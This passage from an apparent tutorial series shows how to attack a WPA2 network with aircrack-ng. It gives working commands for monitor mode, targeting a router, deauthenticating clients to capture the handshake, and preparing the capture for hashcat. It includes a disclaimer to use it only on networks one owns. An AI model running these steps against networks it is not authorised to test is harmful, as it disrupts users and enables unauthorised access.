Part 2 – Using Aircrack-ng
In this section, we’ll begin the process of cracking into our target WPA2 network by using the “aircrack-ng” suite of software tools that is installed by default in Kali Linux. There are other, arguably easier, ways to complete these steps (“Wifite” seems pretty great, honestly), but this is a reliable method that I’ve now used many times successfully.
If you are using another Linux distro such as Ubuntu/Debian or Fedora/RHEL, you will probably need to install the suite.
On Ubuntu or any Debian-based distro:
sudo apt update && sudo apt install -y aircrack-ngOn Fedora or any RPM-based distro:
sudo dnf install aircrack-ngLet’s get started.
Setting the Adapter to Monitor Mode
Startup your Kali VM and make sure your USB Wifi adapter is assigned to it. I use the VMWare Player to run Kali, in part because assigning USB devices to the VM is super simple. Once Kali is running, plug in the adapter and VMWare will pop up a window asking if you want to assign the device to your host OS (no) or the VM (yes).
Check the current network configuration with the Wireless Tools package by typing iwconfig. You should see something like the following screenshot. Note that it reads “Mode:Managed” and the adapter’s name is “wlan0.”
The first tool from aircrack-ng we’ll use is “airmon-ng.” Fire up airmon-ng to check for and kill any interfering processes:
sudo airmon-ng check killThe result will look similar to this:
You’re now ready to put your WiFi adapter into monitor mode. Make sure to replace “wlan0” below with whatever the name of your adapter is (above, the result of the iwconfig command).
sudo airmon-ng start wlan0You can check to make sure this was successful by issuing another iwconfig command, and the result should look similar to the screenshot below. Note that the adapter now says “Mode:Monitor” and the adapter name has been changed to “wlan0mon.”
Finding WLAN Info with Airodump-ng
We can now use the adapter to check for available WLAN’s with the following command:
sudo airodump-ng wlan0monAs you can see below, this shows a lot of useful information about the WLAN’s that happen to be in range of the the adapter.
In this case, the network that I am targeting is “TP-LINK_F3D2.” This is the vulnerable WPA2-protected network that I set up at my house with a TP-LINK router.
OK, this next part should go without saying, but please don’t use this process on a network that you don’t own yourself or have EXPLICIT permission to work with. These are powerful tools and I’m sure there is a temptation for some to take a laptop to a coffee shop or library and see what havoc can be wreaked, but that is both unethical and illegal. This tutorial and others like it exist for educational purposes only — learn how to do this stuff in the event that you might one day have a job that requires infiltrating criminal computer organizations (ie, military, police, etc.). Back to the fun stuff…
This airodump command is useful, but we need to restrict to display only the information about our target network. Write down the BSSID (this is also the MAC address), channel #, and ESSID of your target network on a piece of paper, then type in the following command, replacing my values with yours:
sudo airodump-ng -w TPLink1 -c 9 --bssid EC:08:6B:2B:F3:D2 wlan0monHere we’re telling airodump the name of the file to write once it captures the 4-way handshake between our adapter and the router. We’re also specifying the BSSID and channel to monitor. The result will look like this:
This is where things will get a bit tricky. As you can see above, I only have one client on the TP-LINK network because I set up this network specifically for this tutorial, but if you are cracking your own home network, you will probably see many clients appear under “STATION.” If nothing appears after a minute or so, you will need to get a WiFi-enabled device onto the target network. Use a phone, tablet, another PC, etc. Once it’s connected, it’s MAC address will appear under STATION. If you want, go ahead and sign it in and out of the network a few times; you’ll see that line appear and disappear as you do.
Capturing the 4-way Handshake with Aireplay-ng
While your device is signed into the target network, leave your current terminal window open and then open a new terminal window. In the new window, issue the following command (again, make sure you replace my BSSID and adapter name with yours):
sudo aireplay-ng --deauth 0 -a EC:08:6B:2B:F3:D2 wlan0mon
This command will send repeated “deauthorization” commands to your router and kick off the device(s) you connected. Now, your iPhone (or whatever you had connected to the target network) doesn’t like to be kicked off so it will immediately initiate a 4-way handshake to get back on. Return to the first terminal window. In a few seconds, you should see airodump display that it has captured the 4-way handshake hash. If so, you’re in business!
Airodump will have saved some files to your home directory, named according to the -w argument you specified in an earlier command – mine was TP-LINK1. In that case, the file that I need to take note of is TP-LINK1-01.cap, as shown below. Write down the name of the .cap file that was created on your system; this is what contains the 4-way handshake hash that we are going to crack.
At this point, we are finished using aircrack-ng, so you can safely close both terminal windows if you want. It’s probably a good idea to return your USB WiFi adapter back to managed mode, which you can do with the following commands. Enter these one at a time and they should get you back up and running normally.
sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode managed
sudo service NetworkManager restartIn Part 3 of this series, we’ll use hashcat to crack the password hash that we discovered in this step.
Preparing Hashcat
We are going to use the program hashcat to do the rest of the work for us at this point. First, we must convert the .cap file mentioned above into a file that hashcat understands. For this, we’ll use a hashcat binary specifically for that purpose. Here is the command I used:
sudo /usr/share/hashcat-utils/cap2hccapx.bin TPLink1-01.cap wpa2.hccapxThe binary we need is called cap2hccapx.bin. In my Kali VM, that’s located at /usr/share/hashcat-utils, but your’s may be in a different location. Check to see if it’s in the usual address:
ls -a /usr/share/hashcat-utilsIf you get an error or nothing is in that directory, you will need to search the file system for that .bin. If you happen to be following along on Ubuntu, for example, this utility is in a different location. You can always issue which hashcat which will let you know if the main program is installed and if it can be found in /bin or /sbin.
The rest of the command above is simply the .cap file to be converted, and the name of the .hccapx file we’ve chosen. After running, you should see this (the number of handshakes will vary):
